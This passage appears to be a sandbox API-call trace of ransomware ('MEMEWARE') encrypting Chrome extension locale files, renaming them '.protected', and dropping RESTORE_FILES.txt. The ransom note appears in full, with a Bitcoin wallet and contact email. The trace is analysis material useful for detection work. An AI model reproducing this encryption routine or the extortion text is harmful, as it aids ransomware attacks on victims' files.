lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.749] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.749] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.749] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.749] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.749] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.749] CloseHandle (hObject=0x168) returned 1 [0079.749] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.protected") returned 167 [0079.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.protected")) returned 1 [0079.750] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.750] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.750] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\RESTORE_FILES.txt") returned 161 [0079.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.750] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.750] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.751] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.751] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.751] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.751] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.751] CloseHandle (hObject=0x164) returned 1 [0079.751] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.751] lstrcmpiW (lpString1="fil", lpString2="Windows") returned -1 [0079.751] lstrcmpiW (lpString1="fil", lpString2="Program Files") returned -1 [0079.751] lstrcmpiW (lpString1="fil", lpString2="Program Files (x86)") returned -1 [0079.751] lstrcmpiW (lpString1="fil", lpString2="$Recycle.bin") returned 1 [0079.751] lstrcmpiW (lpString1="fil", lpString2="System Volume Information") returned -1 [0079.751] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil") returned 144 [0079.751] lstrcmpW (lpString1="fil", lpString2=".") returned 1 [0079.751] lstrcmpW (lpString1="fil", lpString2="..") returned 1 [0079.751] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\*") returned 146 [0079.751] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.752] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.752] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.752] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.752] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.752] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.752] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\.") returned 146 [0079.752] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.752] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.752] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.752] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.752] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.752] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.752] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.752] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\..") returned 147 [0079.752] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.752] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.752] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.752] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.752] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.752] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.752] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.752] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.752] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json") returned 158 [0079.752] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.752] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.752] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.752] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.752] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.753] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json") returned 158 [0079.753] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.753] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json") returned 158 [0079.753] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.753] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json") returned 158 [0079.753] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.753] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.753] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.753] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.754] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.754] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.754] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.754] CloseHandle (hObject=0x168) returned 1 [0079.754] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.protected") returned 168 [0079.754] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\messages.json.protected")) returned 1 [0079.754] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.754] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.754] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\RESTORE_FILES.txt") returned 162 [0079.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fil\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.755] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.755] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.755] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.755] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.756] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.756] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.756] CloseHandle (hObject=0x164) returned 1 [0079.756] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.756] lstrcmpiW (lpString1="fr", lpString2="Windows") returned -1 [0079.756] lstrcmpiW (lpString1="fr", lpString2="Program Files") returned -1 [0079.756] lstrcmpiW (lpString1="fr", lpString2="Program Files (x86)") returned -1 [0079.756] lstrcmpiW (lpString1="fr", lpString2="$Recycle.bin") returned 1 [0079.756] lstrcmpiW (lpString1="fr", lpString2="System Volume Information") returned -1 [0079.756] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr") returned 143 [0079.756] lstrcmpW (lpString1="fr", lpString2=".") returned 1 [0079.756] lstrcmpW (lpString1="fr", lpString2="..") returned 1 [0079.756] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\*") returned 145 [0079.756] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.757] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.757] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.757] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.757] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.757] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.757] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\.") returned 145 [0079.757] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.757] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.757] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.757] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.757] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.757] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.757] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.757] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\..") returned 146 [0079.757] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.757] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.757] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.757] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.757] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.757] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.757] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.757] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.757] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json") returned 157 [0079.757] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.757] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.757] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.757] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.757] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.758] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json") returned 157 [0079.758] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.758] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json") returned 157 [0079.758] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.758] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fr\\messages.json") returned 157 [0079.758] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.758] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.758] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 